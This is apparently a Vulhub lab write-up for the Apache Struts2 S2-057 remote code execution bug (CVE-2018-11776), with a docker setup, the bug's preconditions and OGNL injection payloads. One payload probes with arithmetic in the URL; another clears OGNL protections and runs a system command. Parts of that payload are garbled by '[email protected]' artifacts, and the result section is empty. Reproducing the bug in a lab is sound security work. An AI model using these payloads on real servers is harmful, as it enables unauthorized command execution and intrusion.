Struts2 S2-057 Remote Code Execution Vulnerablity(CVE-2018-11776)
Affected Version: <= Struts 2.3.34, Struts 2.5.16
Details:
- https://cwiki.apache.org/confluence/display/WW/S2-057
- https://lgtm.com/blog/apache_struts_CVE-2018-11776
- https://xz.aliyun.com/t/2618
- https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg
Setup
Start the Struts 2.3.34 environment:
docker-compose up -d
After the environment is started, visit http://your-ip:8080/showcase/
and you will see the Struts2 test page.
Exploit
S2-057 requires the following conditions:
- alwaysSelectFullNamespace
is true
- The action element does not have the namespace attribute set, or a wildcard is used
The namespace will be passed by the user from uri and parsed as an OGNL expression, eventually cause remote code execution vulnerablity.
Payload:
http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action
It can be seen that the result of 233*233 has been returned in the Location header.
Use payload from S2-057 vulnerability analysis and POC:
${
(#[email protected]@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@[email protected])).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#[email protected]@getRuntime().exec('id')).(@[email protected](#a.getInputStream()))}
Result:
Copied From: vulhub/struts2/s2-057